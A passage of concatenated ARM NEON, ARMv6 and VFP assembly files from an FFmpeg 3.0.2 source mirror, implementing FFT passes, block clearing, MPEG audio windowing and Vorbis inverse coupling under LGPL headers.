add r3, r3, r0 @ &z[o3]
vld1.32 {d20-d21},[r2,:128] @ {z[o2],z[o2+1]}
movrel r12, pmmp
vld1.32 {d22-d23},[r3,:128] @ {z[o3],z[o3+1]}
add r5, r5, r1 @ wim
vld1.32 {d6-d7}, [r12,:128] @ pmmp
vswp d21, d22
vld1.32 {d4}, [r1,:64]! @ {wre[0],wre[1]}
sub r5, r5, #4 @ wim--
vrev64.32 q1, q11
vmul.f32 q11, q11, d4[1]
vmul.f32 q1, q1, q3
vld1.32 {d5[0]}, [r5,:32] @ d5[0] = wim[-1]
vmla.f32 q11, q1, d5[0] @ {t1a,t2a,t5a,t6a}
vld2.32 {d16-d17},[r0,:128] @ {z[0],z[1]}
sub r6, r6, #1 @ n--
vld2.32 {d18-d19},[r4,:128] @ {z[o1],z[o1+1]}
vzip.32 q10, q11
vadd.f32 d0, d22, d20
vadd.f32 d1, d21, d23
vsub.f32 d2, d21, d23
vsub.f32 d3, d22, d20
vsub.f32 q10, q8, q0
vadd.f32 q8, q8, q0
vsub.f32 q11, q9, q1
vadd.f32 q9, q9, q1
vst2.32 {d20-d21},[r2,:128]! @ {z[o2],z[o2+1]}
vst2.32 {d16-d17},[r0,:128]! @ {z[0],z[1]}
vst2.32 {d22-d23},[r3,:128]! @ {z[o3],z[o3+1]}
vst2.32 {d18-d19},[r4,:128]! @ {z[o1],z[o1+1]}
sub r5, r5, #8 @ wim -= 2
1:
vld1.32 {d20-d21},[r2,:128] @ {z[o2],z[o2+1]}
vld1.32 {d22-d23},[r3,:128] @ {z[o3],z[o3+1]}
vswp d21, d22
vld1.32 {d4}, [r1]! @ {wre[0],wre[1]}
vrev64.32 q0, q10
vmul.f32 q10, q10, d4[0]
vrev64.32 q1, q11
vmul.f32 q11, q11, d4[1]
vld1.32 {d5}, [r5] @ {wim[-1],wim[0]}
vmul.f32 q0, q0, q3
sub r5, r5, #8 @ wim -= 2
vmul.f32 q1, q1, q3
vmla.f32 q10, q0, d5[1] @ {t1,t2,t5,t6}
vmla.f32 q11, q1, d5[0] @ {t1a,t2a,t5a,t6a}
vld2.32 {d16-d17},[r0,:128] @ {z[0],z[1]}
subs r6, r6, #1 @ n--
vld2.32 {d18-d19},[r4,:128] @ {z[o1],z[o1+1]}
vzip.32 q10, q11
vadd.f32 d0, d22, d20
vadd.f32 d1, d21, d23
vsub.f32 d2, d21, d23
vsub.f32 d3, d22, d20
vsub.f32 q10, q8, q0
vadd.f32 q8, q8, q0
vsub.f32 q11, q9, q1
vadd.f32 q9, q9, q1
vst2.32 {d20-d21}, [r2,:128]! @ {z[o2],z[o2+1]}
vst2.32 {d16-d17}, [r0,:128]! @ {z[0],z[1]}
vst2.32 {d22-d23}, [r3,:128]! @ {z[o3],z[o3+1]}
vst2.32 {d18-d19}, [r4,:128]! @ {z[o1],z[o1+1]}
bne 1b
pop {r4-r6,pc}
endfunc
.macro def_fft n, n2, n4
.align 6
function fft\n\()_neon
push {r4, lr}
mov r4, r0
bl fft\n2\()_neon
add r0, r4, #\n4*2*8
bl fft\n4\()_neon
add r0, r4, #\n4*3*8
bl fft\n4\()_neon
mov r0, r4
pop {r4, lr}
movrelx r1, X(ff_cos_\n)
mov r2, #\n4/2
b fft_pass_neon
endfunc
.endm
def_fft 32, 16, 8
def_fft 64, 32, 16
def_fft 128, 64, 32
def_fft 256, 128, 64
def_fft 512, 256, 128
def_fft 1024, 512, 256
def_fft 2048, 1024, 512
def_fft 4096, 2048, 1024
def_fft 8192, 4096, 2048
def_fft 16384, 8192, 4096
def_fft 32768, 16384, 8192
def_fft 65536, 32768, 16384
function ff_fft_calc_neon, export=1
ldr r2, [r0]
sub r2, r2, #2
movrel r3, fft_tab_neon
ldr r3, [r3, r2, lsl #2]
mov r0, r1
bx r3
endfunc
function ff_fft_permute_neon, export=1
push {r4,lr}
mov r12, #1
ldr r2, [r0] @ nbits
ldr r3, [r0, #12] @ tmp_buf
ldr r0, [r0, #8] @ revtab
lsl r12, r12, r2
mov r2, r12
1:
vld1.32 {d0-d1}, [r1,:128]!
ldr r4, [r0], #4
uxth lr, r4
uxth r4, r4, ror #16
add lr, r3, lr, lsl #3
add r4, r3, r4, lsl #3
vst1.32 {d0}, [lr,:64]
vst1.32 {d1}, [r4,:64]
subs r12, r12, #2
bgt 1b
sub r1, r1, r2, lsl #3
1:
vld1.32 {d0-d3}, [r3,:128]!
vst1.32 {d0-d3}, [r1,:128]!
subs r2, r2, #4
bgt 1b
pop {r4,pc}
endfunc
const fft_tab_neon, relocate=1
.word fft4_neon
.word fft8_neon
.word fft16_neon
.word fft32_neon
.word fft64_neon
.word fft128_neon
.word fft256_neon
.word fft512_neon
.word fft1024_neon
.word fft2048_neon
.word fft4096_neon
.word fft8192_neon
.word fft16384_neon
.word fft32768_neon
.word fft65536_neon
endconst
const pmmp, align=4
.float +1.0, -1.0, -1.0, +1.0
endconst
const mppm, align=4
.float -M_SQRT1_2, M_SQRT1_2, M_SQRT1_2, -M_SQRT1_2
endconst
|
Akagi201/ffmpeg-xcode
| 1,268
|
ffmpeg-3.0.2/libavcodec/arm/blockdsp_neon.S
|
/*
* ARM NEON optimised block functions
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
function ff_clear_block_neon, export=1
vmov.i16 q0, #0
.rept 8
vst1.16 {q0}, [r0,:128]!
.endr
bx lr
endfunc
function ff_clear_blocks_neon, export=1
vmov.i16 q0, #0
.rept 8*6
vst1.16 {q0}, [r0,:128]!
.endr
bx lr
endfunc
|
Akagi201/ffmpeg-xcode
| 5,015
|
ffmpeg-3.0.2/libavcodec/arm/mpegaudiodsp_fixed_armv6.S
|
/*
* Copyright (c) 2011 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
.macro skip args:vararg
.endm
.macro sum8 lo, hi, w, p, t1, t2, t3, t4, rsb=skip, offs=0
ldr \t1, [\w, #4*\offs]
ldr \t2, [\p, #4]!
\rsb \t1, \t1, #0
.irpc i, 135
ldr \t3, [\w, #4*64*\i+4*\offs]
ldr \t4, [\p, #4*64*\i]
smlal \lo, \hi, \t1, \t2
\rsb \t3, \t3, #0
ldr \t1, [\w, #4*64*(\i+1)+4*\offs]
ldr \t2, [\p, #4*64*(\i+1)]
smlal \lo, \hi, \t3, \t4
\rsb \t1, \t1, #0
.endr
ldr \t3, [\w, #4*64*7+4*\offs]
ldr \t4, [\p, #4*64*7]
smlal \lo, \hi, \t1, \t2
\rsb \t3, \t3, #0
smlal \lo, \hi, \t3, \t4
.endm
.macro round rd, lo, hi
lsr \rd, \lo, #24
bic \lo, \lo, #0xff000000
orr \rd, \rd, \hi, lsl #8
mov \hi, #0
ssat \rd, #16, \rd
.endm
function ff_mpadsp_apply_window_fixed_armv6, export=1
push {r2,r4-r11,lr}
add r4, r0, #4*512 @ synth_buf + 512
.rept 4
ldm r0!, {r5-r12}
stm r4!, {r5-r12}
.endr
ldr r4, [sp, #40] @ incr
sub r0, r0, #4*17 @ synth_buf + 16
ldr r8, [r2] @ sum:low
add r2, r0, #4*32 @ synth_buf + 48
rsb r5, r4, r4, lsl #5 @ 31 * incr
lsl r4, r4, #1
asr r9, r8, #31 @ sum:high
add r5, r3, r5, lsl #1 @ samples2
add r6, r1, #4*32 @ w2
str r4, [sp, #40]
sum8 r8, r9, r1, r0, r10, r11, r12, lr
sum8 r8, r9, r1, r2, r10, r11, r12, lr, rsb, 32
round r10, r8, r9
strh_post r10, r3, r4
mov lr, #15
1:
ldr r12, [r0, #4]!
ldr r11, [r6, #-4]!
ldr r10, [r1, #4]!
.irpc i, 0246
.if \i
ldr r11, [r6, #4*64*\i]
ldr r10, [r1, #4*64*\i]
.endif
rsb r11, r11, #0
smlal r8, r9, r10, r12
ldr r10, [r0, #4*64*(\i+1)]
.ifeq \i
smull r4, r7, r11, r12
.else
smlal r4, r7, r11, r12
.endif
ldr r11, [r6, #4*64*(\i+1)]
ldr r12, [r1, #4*64*(\i+1)]
rsb r11, r11, #0
smlal r8, r9, r12, r10
.iflt \i-6
ldr r12, [r0, #4*64*(\i+2)]
.else
ldr r12, [r2, #-4]!
.endif
smlal r4, r7, r11, r10
.endr
.irpc i, 0246
ldr r10, [r1, #4*64*\i+4*32]
rsb r12, r12, #0
ldr r11, [r6, #4*64*\i+4*32]
smlal r8, r9, r10, r12
ldr r10, [r2, #4*64*(\i+1)]
smlal r4, r7, r11, r12
ldr r12, [r1, #4*64*(\i+1)+4*32]
rsb r10, r10, #0
ldr r11, [r6, #4*64*(\i+1)+4*32]
smlal r8, r9, r12, r10
.iflt \i-6
ldr r12, [r2, #4*64*(\i+2)]
.else
ldr r12, [sp, #40]
.endif
smlal r4, r7, r11, r10
.endr
round r10, r8, r9
adds r8, r8, r4
adc r9, r9, r7
strh_post r10, r3, r12
round r11, r8, r9
subs lr, lr, #1
strh_dpost r11, r5, r12
bgt 1b
sum8 r8, r9, r1, r0, r10, r11, r12, lr, rsb, 33
pop {r4}
round r10, r8, r9
str r8, [r4]
strh r10, [r3]
pop {r4-r11,pc}
endfunc
|
Akagi201/ffmpeg-xcode
| 3,050
|
ffmpeg-3.0.2/libavcodec/arm/vorbisdsp_neon.S
|
/*
* ARM NEON optimised DSP functions
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
function ff_vorbis_inverse_coupling_neon, export=1
vmov.i32 q10, #1<<31
subs r2, r2, #4
mov r3, r0
mov r12, r1
beq 3f
vld1.32 {d24-d25},[r1,:128]!
vld1.32 {d22-d23},[r0,:128]!
vcle.s32 q8, q12, #0
vand q9, q11, q10
veor q12, q12, q9
vand q2, q12, q8
vbic q3, q12, q8
vadd.f32 q12, q11, q2
vsub.f32 q11, q11, q3
1: vld1.32 {d2-d3}, [r1,:128]!
vld1.32 {d0-d1}, [r0,:128]!
vcle.s32 q8, q1, #0
vand q9, q0, q10
veor q1, q1, q9
vst1.32 {d24-d25},[r3, :128]!
vst1.32 {d22-d23},[r12,:128]!
vand q2, q1, q8
vbic q3, q1, q8
vadd.f32 q1, q0, q2
vsub.f32 q0, q0, q3
subs r2, r2, #8
ble 2f
vld1.32 {d24-d25},[r1,:128]!
vld1.32 {d22-d23},[r0,:128]!
vcle.s32 q8, q12, #0
vand q9, q11, q10
veor q12, q12, q9
vst1.32 {d2-d3}, [r3, :128]!
vst1.32 {d0-d1}, [r12,:128]!
vand q2, q12, q8
vbic q3, q12, q8
vadd.f32 q12, q11, q2
vsub.f32 q11, q11, q3
b 1b
2: vst1.32 {d2-d3}, [r3, :128]!
vst1.32 {d0-d1}, [r12,:128]!
it lt
bxlt lr
3: vld1.32 {d2-d3}, [r1,:128]
vld1.32 {d0-d1}, [r0,:128]
vcle.s32 q8, q1, #0
vand q9, q0, q10
veor q1, q1, q9
vand q2, q1, q8
vbic q3, q1, q8
vadd.f32 q1, q0, q2
vsub.f32 q0, q0, q3
vst1.32 {d2-d3}, [r0,:128]!
vst1.32 {d0-d1}, [r1,:128]!
bx lr
endfunc
|
Akagi201/ffmpeg-xcode
| 19,099
|
ffmpeg-3.0.2/libavcodec/arm/fft_vfp.S
|
/*
* Copyright (c) 2013 RISC OS Open Ltd
* Author: Ben Avison <bavison@riscosopen.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
@ The fftx_internal_vfp versions of the functions obey a modified AAPCS:
@ VFP is in RunFast mode, vector length 4, stride 1 thoroughout, and
@ all single-precision VFP registers may be corrupted on exit. The a2
@ register may not be clobbered in these functions, as it holds the
@ stored original FPSCR.
function ff_fft_calc_vfp, export=1
ldr ip, [a1, #0] @ nbits
mov a1, a2
movrel a2, (fft_tab_vfp - 8)
ldr pc, [a2, ip, lsl #2]
endfunc
const fft_tab_vfp, relocate=1
.word fft4_vfp
.word fft8_vfp
.word X(ff_fft16_vfp) @ this one alone is exported
.word fft32_vfp
.word fft64_vfp
.word fft128_vfp
.word fft256_vfp
.word fft512_vfp
.word fft1024_vfp
.word fft2048_vfp
.word fft4096_vfp
.word fft8192_vfp
.word fft16384_vfp
.word fft32768_vfp
.word fft65536_vfp
endconst
function fft4_vfp
vldr d0, [a1, #0*2*4] @ s0,s1 = z[0]
vldr d4, [a1, #1*2*4] @ s8,s9 = z[1]
vldr d1, [a1, #2*2*4] @ s2,s3 = z[2]
vldr d5, [a1, #3*2*4] @ s10,s11 = z[3]
@ stall
vadd.f s12, s0, s8 @ i0
vadd.f s13, s1, s9 @ i1
vadd.f s14, s2, s10 @ i2
vadd.f s15, s3, s11 @ i3
vsub.f s8, s0, s8 @ i4
vsub.f s9, s1, s9 @ i5
vsub.f s10, s2, s10 @ i6
vsub.f s11, s3, s11 @ i7
@ stall
@ stall
vadd.f s0, s12, s14 @ z[0].re
vsub.f s4, s12, s14 @ z[2].re
vadd.f s1, s13, s15 @ z[0].im
vsub.f s5, s13, s15 @ z[2].im
vadd.f s7, s9, s10 @ z[3].im
vsub.f s3, s9, s10 @ z[1].im
vadd.f s2, s8, s11 @ z[1].re
vsub.f s6, s8, s11 @ z[3].re
@ stall
@ stall
vstr d0, [a1, #0*2*4]
vstr d2, [a1, #2*2*4]
@ stall
@ stall
vstr d1, [a1, #1*2*4]
vstr d3, [a1, #3*2*4]
bx lr
endfunc
.macro macro_fft8_head
@ FFT4
vldr d4, [a1, #0 * 2*4]
vldr d6, [a1, #1 * 2*4]
vldr d5, [a1, #2 * 2*4]
vldr d7, [a1, #3 * 2*4]
@ BF
vldr d12, [a1, #4 * 2*4]
vadd.f s16, s8, s12 @ vector op
vldr d14, [a1, #5 * 2*4]
vldr d13, [a1, #6 * 2*4]
vldr d15, [a1, #7 * 2*4]
vsub.f s20, s8, s12 @ vector op
vadd.f s0, s16, s18
vsub.f s2, s16, s18
vadd.f s1, s17, s19
vsub.f s3, s17, s19
vadd.f s7, s21, s22
vsub.f s5, s21, s22
vadd.f s4, s20, s23
vsub.f s6, s20, s23
vsub.f s20, s24, s28 @ vector op
vstr d0, [a1, #0 * 2*4] @ transfer s0-s7 to s24-s31 via memory
vstr d1, [a1, #1 * 2*4]
vldr s0, cos1pi4
vadd.f s16, s24, s28 @ vector op
vstr d2, [a1, #2 * 2*4]
vstr d3, [a1, #3 * 2*4]
vldr d12, [a1, #0 * 2*4]
@ TRANSFORM
vmul.f s20, s20, s0 @ vector x scalar op
vldr d13, [a1, #1 * 2*4]
vldr d14, [a1, #2 * 2*4]
vldr d15, [a1, #3 * 2*4]
@ BUTTERFLIES
vadd.f s0, s18, s16
vadd.f s1, s17, s19
vsub.f s2, s17, s19
vsub.f s3, s18, s16
vadd.f s4, s21, s20
vsub.f s5, s21, s20
vadd.f s6, s22, s23
vsub.f s7, s22, s23
vadd.f s8, s0, s24 @ vector op
vstr d0, [a1, #0 * 2*4] @ transfer s0-s3 to s12-s15 via memory
vstr d1, [a1, #1 * 2*4]
vldr d6, [a1, #0 * 2*4]
vldr d7, [a1, #1 * 2*4]
vadd.f s1, s5, s6
vadd.f s0, s7, s4
vsub.f s2, s5, s6
vsub.f s3, s7, s4
vsub.f s12, s24, s12 @ vector op
vsub.f s5, s29, s1
vsub.f s4, s28, s0
vsub.f s6, s30, s2
vsub.f s7, s31, s3
vadd.f s16, s0, s28 @ vector op
vstr d6, [a1, #4 * 2*4]
vstr d7, [a1, #6 * 2*4]
vstr d4, [a1, #0 * 2*4]
vstr d5, [a1, #2 * 2*4]
vstr d2, [a1, #5 * 2*4]
vstr d3, [a1, #7 * 2*4]
.endm
.macro macro_fft8_tail
vstr d8, [a1, #1 * 2*4]
vstr d9, [a1, #3 * 2*4]
.endm
function .Lfft8_internal_vfp
macro_fft8_head
macro_fft8_tail
bx lr
endfunc
function fft8_vfp
ldr a3, =0x03030000 @ RunFast mode, vector length 4, stride 1
fmrx a2, FPSCR
fmxr FPSCR, a3
vpush {s16-s31}
mov ip, lr
bl .Lfft8_internal_vfp
vpop {s16-s31}
fmxr FPSCR, a2
bx ip
endfunc
.align 3
cos1pi4: @ cos(1*pi/4) = sqrt(2)
.float 0.707106769084930419921875
cos1pi8: @ cos(1*pi/8) = sqrt(2+sqrt(2))/2
.float 0.92387950420379638671875
cos3pi8: @ cos(2*pi/8) = sqrt(2-sqrt(2))/2
.float 0.3826834261417388916015625
function .Lfft16_internal_vfp
macro_fft8_head
@ FFT4(z+8)
vldr d10, [a1, #8 * 2*4]
vldr d12, [a1, #9 * 2*4]
vldr d11, [a1, #10 * 2*4]
vldr d13, [a1, #11 * 2*4]
macro_fft8_tail
vadd.f s16, s20, s24 @ vector op
@ FFT4(z+12)
vldr d4, [a1, #12 * 2*4]
vldr d6, [a1, #13 * 2*4]
vldr d5, [a1, #14 * 2*4]
vsub.f s20, s20, s24 @ vector op
vldr d7, [a1, #15 * 2*4]
vadd.f s0, s16, s18
vsub.f s4, s16, s18
vadd.f s1, s17, s19
vsub.f s5, s17, s19
vadd.f s7, s21, s22
vsub.f s3, s21, s22
vadd.f s2, s20, s23
vsub.f s6, s20, s23
vadd.f s16, s8, s12 @ vector op
vstr d0, [a1, #8 * 2*4]
vstr d2, [a1, #10 * 2*4]
vstr d1, [a1, #9 * 2*4]
vsub.f s20, s8, s12
vstr d3, [a1, #11 * 2*4]
@ TRANSFORM(z[2],z[6],z[10],z[14],cos1pi4,cos1pi4)
vldr d12, [a1, #10 * 2*4]
vadd.f s0, s16, s18
vadd.f s1, s17, s19
vsub.f s6, s16, s18
vsub.f s7, s17, s19
vsub.f s3, s21, s22
vadd.f s2, s20, s23
vadd.f s5, s21, s22
vsub.f s4, s20, s23
vstr d0, [a1, #12 * 2*4]
vmov s0, s6
@ TRANSFORM(z[1],z[5],z[9],z[13],cos1pi8,cos3pi8)
vldr d6, [a1, #9 * 2*4]
vstr d1, [a1, #13 * 2*4]
vldr d1, cos1pi4 @ s2 = cos1pi4, s3 = cos1pi8
vstr d2, [a1, #15 * 2*4]
vldr d7, [a1, #13 * 2*4]
vadd.f s4, s25, s24
vsub.f s5, s25, s24
vsub.f s6, s0, s7
vadd.f s7, s0, s7
vmul.f s20, s12, s3 @ vector op
@ TRANSFORM(z[3],z[7],z[11],z[15],cos3pi8,cos1pi8)
vldr d4, [a1, #11 * 2*4]
vldr d5, [a1, #15 * 2*4]
vldr s1, cos3pi8
vmul.f s24, s4, s2 @ vector * scalar op
vmul.f s28, s12, s1 @ vector * scalar op
vmul.f s12, s8, s1 @ vector * scalar op
vadd.f s4, s20, s29
vsub.f s5, s21, s28
vsub.f s6, s22, s31
vadd.f s7, s23, s30
vmul.f s8, s8, s3 @ vector * scalar op
vldr d8, [a1, #1 * 2*4]
vldr d9, [a1, #5 * 2*4]
vldr d10, [a1, #3 * 2*4]
vldr d11, [a1, #7 * 2*4]
vldr d14, [a1, #2 * 2*4]
vadd.f s0, s6, s4
vadd.f s1, s5, s7
vsub.f s2, s5, s7
vsub.f s3, s6, s4
vadd.f s4, s12, s9
vsub.f s5, s13, s8
vsub.f s6, s14, s11
vadd.f s7, s15, s10
vadd.f s12, s0, s16 @ vector op
vstr d0, [a1, #1 * 2*4]
vstr d1, [a1, #5 * 2*4]
vldr d4, [a1, #1 * 2*4]
vldr d5, [a1, #5 * 2*4]
vadd.f s0, s6, s4
vadd.f s1, s5, s7
vsub.f s2, s5, s7
vsub.f s3, s6, s4
vsub.f s8, s16, s8 @ vector op
vstr d6, [a1, #1 * 2*4]
vstr d7, [a1, #5 * 2*4]
vldr d15, [a1, #6 * 2*4]
vsub.f s4, s20, s0
vsub.f s5, s21, s1
vsub.f s6, s22, s2
vsub.f s7, s23, s3
vadd.f s20, s0, s20 @ vector op
vstr d4, [a1, #9 * 2*4]
@ TRANSFORM_ZERO(z[0],z[4],z[8],z[12])
vldr d6, [a1, #8 * 2*4]
vstr d5, [a1, #13 * 2*4]
vldr d7, [a1, #12 * 2*4]
vstr d2, [a1, #11 * 2*4]
vldr d8, [a1, #0 * 2*4]
vstr d3, [a1, #15 * 2*4]
vldr d9, [a1, #4 * 2*4]
vadd.f s0, s26, s24
vadd.f s1, s25, s27
vsub.f s2, s25, s27
vsub.f s3, s26, s24
vadd.f s4, s14, s12
vadd.f s5, s13, s15
vsub.f s6, s13, s15
vsub.f s7, s14, s12
vadd.f s8, s0, s28 @ vector op
vstr d0, [a1, #3 * 2*4]
vstr d1, [a1, #7 * 2*4]
vldr d6, [a1, #3 * 2*4]
vldr d7, [a1, #7 * 2*4]
vsub.f s0, s16, s4
vsub.f s1, s17, s5
vsub.f s2, s18, s6
vsub.f s3, s19, s7
vsub.f s12, s28, s12 @ vector op
vadd.f s16, s4, s16 @ vector op
vstr d10, [a1, #3 * 2*4]
vstr d11, [a1, #7 * 2*4]
vstr d4, [a1, #2 * 2*4]
vstr d5, [a1, #6 * 2*4]
vstr d0, [a1, #8 * 2*4]
vstr d1, [a1, #12 * 2*4]
vstr d6, [a1, #10 * 2*4]
vstr d7, [a1, #14 * 2*4]
vstr d8, [a1, #0 * 2*4]
vstr d9, [a1, #4 * 2*4]
bx lr
endfunc
function ff_fft16_vfp, export=1
ldr a3, =0x03030000 @ RunFast mode, vector length 4, stride 1
fmrx a2, FPSCR
fmxr FPSCR, a3
vpush {s16-s31}
mov ip, lr
bl .Lfft16_internal_vfp
vpop {s16-s31}
fmxr FPSCR, a2
bx ip
endfunc
.macro pass n, z0, z1, z2, z3
add v6, v5, #4*2*\n
@ TRANSFORM_ZERO(z[0],z[o1],z[o2],z[o3])
@ TRANSFORM(z[1],z[o1+1],z[o2+1],z[o3+1],wre[1],wim[-1])
@ TRANSFORM(z[0],z[o1],z[o2],z[o3],wre[0],wim[0])
@ TRANSFORM(z[1],z[o1+1],z[o2+1],z[o3+1],wre[1],wim[-1])
vldr d8, [\z2, #8*(o2+1)] @ s16,s17
vldmdb v6!, {s2}
vldr d9, [\z3, #8*(o3+1)] @ s18,s19
vldmia v5!, {s0,s1} @ s0 is unused
vldr s7, [\z2, #8*o2] @ t1
vmul.f s20, s16, s2 @ vector * scalar
vldr s0, [\z3, #8*o3] @ t5
vldr s6, [\z2, #8*o2+4] @ t2
vldr s3, [\z3, #8*o3+4] @ t6
vmul.f s16, s16, s1 @ vector * scalar
ldr a4, =\n-1
1: add \z0, \z0, #8*2
.if \n*4*2 >= 512
add \z1, \z1, #8*2
.endif
.if \n*4*2 >= 256
add \z2, \z2, #8*2
.endif
.if \n*4*2 >= 512
add \z3, \z3, #8*2
.endif
@ up to 2 stalls (VFP vector issuing / waiting for s0)
@ depending upon whether this is the first iteration and
@ how many add instructions are inserted above
vadd.f s4, s0, s7 @ t5
vadd.f s5, s6, s3 @ t6
vsub.f s6, s6, s3 @ t4
vsub.f s7, s0, s7 @ t3
vldr d6, [\z0, #8*0-8*2] @ s12,s13
vadd.f s0, s16, s21 @ t1
vldr d7, [\z1, #8*o1-8*2] @ s14,s15
vsub.f s1, s18, s23 @ t5
vadd.f s8, s4, s12 @ vector + vector
@ stall (VFP vector issuing)
@ stall (VFP vector issuing)
@ stall (VFP vector issuing)
vsub.f s4, s12, s4
vsub.f s5, s13, s5
vsub.f s6, s14, s6
vsub.f s7, s15, s7
vsub.f s2, s17, s20 @ t2
vadd.f s3, s19, s22 @ t6
vstr d4, [\z0, #8*0-8*2] @ s8,s9
vstr d5, [\z1, #8*o1-8*2] @ s10,s11
@ stall (waiting for s5)
vstr d2, [\z2, #8*o2-8*2] @ s4,s5
vadd.f s4, s1, s0 @ t5
vstr d3, [\z3, #8*o3-8*2] @ s6,s7
vsub.f s7, s1, s0 @ t3
vadd.f s5, s2, s3 @ t6
vsub.f s6, s2, s3 @ t4
vldr d6, [\z0, #8*1-8*2] @ s12,s13
vldr d7, [\z1, #8*(o1+1)-8*2] @ s14,s15
vldr d4, [\z2, #8*o2] @ s8,s9
vldmdb v6!, {s2,s3}
vldr d5, [\z3, #8*o3] @ s10,s11
vadd.f s20, s4, s12 @ vector + vector
vldmia v5!, {s0,s1}
vldr d8, [\z2, #8*(o2+1)] @ s16,s17
@ stall (VFP vector issuing)
vsub.f s4, s12, s4
vsub.f s5, s13, s5
vsub.f s6, s14, s6
vsub.f s7, s15, s7
vmul.f s12, s8, s3 @ vector * scalar
vstr d10, [\z0, #8*1-8*2] @ s20,s21
vldr d9, [\z3, #8*(o3+1)] @ s18,s19
vstr d11, [\z1, #8*(o1+1)-8*2] @ s22,s23
vmul.f s8, s8, s0 @ vector * scalar
vstr d2, [\z2, #8*(o2+1)-8*2] @ s4,s5
@ stall (waiting for s7)
vstr d3, [\z3, #8*(o3+1)-8*2] @ s6,s7
vmul.f s20, s16, s2 @ vector * scalar
@ stall (VFP vector issuing)
@ stall (VFP vector issuing)
@ stall (VFP vector issuing)
vadd.f s7, s8, s13 @ t1
vsub.f s6, s9, s12 @ t2
vsub.f s0, s10, s15 @ t5
vadd.f s3, s11, s14 @ t6
vmul.f s16, s16, s1 @ vector * scalar
subs a4, a4, #1
bne 1b
@ What remains is identical to the first two indentations of
@ the above, but without the increment of z
vadd.f s4, s0, s7 @ t5
vadd.f s5, s6, s3 @ t6
vsub.f s6, s6, s3 @ t4
vsub.f s7, s0, s7 @ t3
vldr d6, [\z0, #8*0] @ s12,s13
vadd.f s0, s16, s21 @ t1
vldr d7, [\z1, #8*o1] @ s14,s15
vsub.f s1, s18, s23 @ t5
vadd.f s8, s4, s12 @ vector + vector
vsub.f s4, s12, s4
vsub.f s5, s13, s5
vsub.f s6, s14, s6
vsub.f s7, s15, s7
vsub.f s2, s17, s20 @ t2
vadd.f s3, s19, s22 @ t6
vstr d4, [\z0, #8*0] @ s8,s9
vstr d5, [\z1, #8*o1] @ s10,s11
vstr d2, [\z2, #8*o2] @ s4,s5
vadd.f s4, s1, s0 @ t5
vstr d3, [\z3, #8*o3] @ s6,s7
vsub.f s7, s1, s0 @ t3
vadd.f s5, s2, s3 @ t6
vsub.f s6, s2, s3 @ t4
vldr d6, [\z0, #8*1] @ s12,s13
vldr d7, [\z1, #8*(o1+1)] @ s14,s15
vadd.f s20, s4, s12 @ vector + vector
vsub.f s4, s12, s4
vsub.f s5, s13, s5
vsub.f s6, s14, s6
vsub.f s7, s15, s7
vstr d10, [\z0, #8*1] @ s20,s21
vstr d11, [\z1, #8*(o1+1)] @ s22,s23
vstr d2, [\z2, #8*(o2+1)] @ s4,s5
vstr d3, [\z3, #8*(o3+1)] @ s6,s7
.endm
.macro def_fft n, n2, n4
function .Lfft\n\()_internal_vfp
.if \n >= 512
push {v1-v6,lr}
.elseif \n >= 256
push {v1-v2,v5-v6,lr}
.else
push {v1,v5-v6,lr}
.endif
mov v1, a1
bl .Lfft\n2\()_internal_vfp
add a1, v1, #8*(\n/4)*2
bl .Lfft\n4\()_internal_vfp
movrelx v5, X(ff_cos_\n), a1
add a1, v1, #8*(\n/4)*3
bl .Lfft\n4\()_internal_vfp
.if \n >= 512
.set o1, 0*(\n/4/2)
.set o2, 0*(\n/4/2)
.set o3, 0*(\n/4/2)
add v2, v1, #8*2*(\n/4/2)
add v3, v1, #8*4*(\n/4/2)
add v4, v1, #8*6*(\n/4/2)
pass (\n/4/2), v1, v2, v3, v4
pop {v1-v6,pc}
.elseif \n >= 256
.set o1, 2*(\n/4/2)
.set o2, 0*(\n/4/2)
.set o3, 2*(\n/4/2)
add v2, v1, #8*4*(\n/4/2)
pass (\n/4/2), v1, v1, v2, v2
